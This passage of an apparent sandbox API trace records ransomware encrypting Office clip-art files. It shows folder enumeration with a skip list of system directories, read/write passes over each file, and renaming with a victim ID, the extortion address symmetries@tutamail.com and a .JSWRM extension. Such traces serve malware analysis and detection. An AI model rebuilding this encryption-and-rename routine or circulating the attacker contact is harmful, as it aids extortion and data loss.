CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0079.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0079.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0079.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0079.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0079.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.379] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086384.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086384.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0079.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.379] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x257c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0086420.WMF", cAlternateFileName="")) returned 1 [0079.380] lstrcmpiW (lpString1="J0086420.WMF", lpString2=".") returned 1 [0079.380] lstrcmpiW (lpString1="J0086420.WMF", lpString2="..") returned 1 [0079.380] lstrcmpiW (lpString1="J0086420.WMF", lpString2="...") returned 1 [0079.380] lstrcmpiW (lpString1="J0086420.WMF", lpString2="windows") returned -1 [0079.380] lstrcmpiW (lpString1="J0086420.WMF", lpString2="recovery") returned -1 [0079.380] lstrcmpiW (lpString1="J0086420.WMF", lpString2="perflogs") returned -1 [0079.380] lstrcmpiW (lpString1="J0086420.WMF", lpString2="documents and settings") returned 1 [0079.380] lstrcmpiW (lpString1="J0086420.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.380] lstrcmpiW (lpString1="J0086420.WMF", lpString2="system volume information") returned -1 [0079.380] lstrcmpiW (lpString1="J0086420.WMF", lpString2="msocache") returned -1 [0079.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0079.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086420.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086420.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086420.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0079.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086420.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086420.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086420.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086420.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.380] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9596) returned 1 [0079.381] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2570) returned 0x24d210 [0079.381] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2570, lpOverlapped=0x0) returned 1 [0079.383] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.383] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2570, lpOverlapped=0x0) returned 1 [0079.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.383] CloseHandle (hObject=0x314) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0079.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0079.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0079.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0079.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.383] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086420.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086420.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0079.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.384] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4278, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0086424.WMF", cAlternateFileName="")) returned 1 [0079.384] lstrcmpiW (lpString1="J0086424.WMF", lpString2=".") returned 1 [0079.384] lstrcmpiW (lpString1="J0086424.WMF", lpString2="..") returned 1 [0079.384] lstrcmpiW (lpString1="J0086424.WMF", lpString2="...") returned 1 [0079.384] lstrcmpiW (lpString1="J0086424.WMF", lpString2="windows") returned -1 [0079.384] lstrcmpiW (lpString1="J0086424.WMF", lpString2="recovery") returned -1 [0079.384] lstrcmpiW (lpString1="J0086424.WMF", lpString2="perflogs") returned -1 [0079.384] lstrcmpiW (lpString1="J0086424.WMF", lpString2="documents and settings") returned 1 [0079.384] lstrcmpiW (lpString1="J0086424.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.384] lstrcmpiW (lpString1="J0086424.WMF", lpString2="system volume information") returned -1 [0079.384] lstrcmpiW (lpString1="J0086424.WMF", lpString2="msocache") returned -1 [0079.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086424.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086424.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086424.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086424.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086424.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086424.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086424.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.386] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17016) returned 1 [0079.386] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4270) returned 0x24d210 [0079.386] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4270, lpOverlapped=0x0) returned 1 [0079.388] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.388] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4270, lpOverlapped=0x0) returned 1 [0079.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.388] CloseHandle (hObject=0x314) returned 1 [0079.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0079.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0079.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0079.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0079.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0079.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0079.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.389] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086424.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086424.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0079.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0079.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.390] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5516, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0086426.WMF", cAlternateFileName="")) returned 1 [0079.390] lstrcmpiW (lpString1="J0086426.WMF", lpString2=".") returned 1 [0079.390] lstrcmpiW (lpString1="J0086426.WMF", lpString2="..") returned 1 [0079.390] lstrcmpiW (lpString1="J0086426.WMF", lpString2="...") returned 1 [0079.390] lstrcmpiW (lpString1="J0086426.WMF", lpString2="windows") returned -1 [0079.390] lstrcmpiW (lpString1="J0086426.WMF", lpString2="recovery") returned -1 [0079.390] lstrcmpiW (lpString1="J0086426.WMF", lpString2="perflogs") returned -1 [0079.390] lstrcmpiW (lpString1="J0086426.WMF", lpString2="documents and settings") returned 1 [0079.390] lstrcmpiW (lpString1="J0086426.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.390] lstrcmpiW (lpString1="J0086426.WMF", lpString2="system volume information") returned -1 [0079.390] lstrcmpiW (lpString1="J0086426.WMF", lpString2="msocache") returned -1 [0079.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086426.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086426.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086426.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0079.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086426.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086426.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086426.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0079.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0079.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086426.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.391] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21782) returned 1 [0079.391] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5510) returned 0x24d210 [0079.391] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5510, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5510, lpOverlapped=0x0) returned 1 [0079.394] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.394] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5510, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5510, lpOverlapped=0x0) returned 1 [0079.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.394] CloseHandle (hObject=0x314) returned 1 [0079.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0079.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0079.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0079.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0079.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0079.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.395] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086426.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086426.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0079.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0079.395] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, 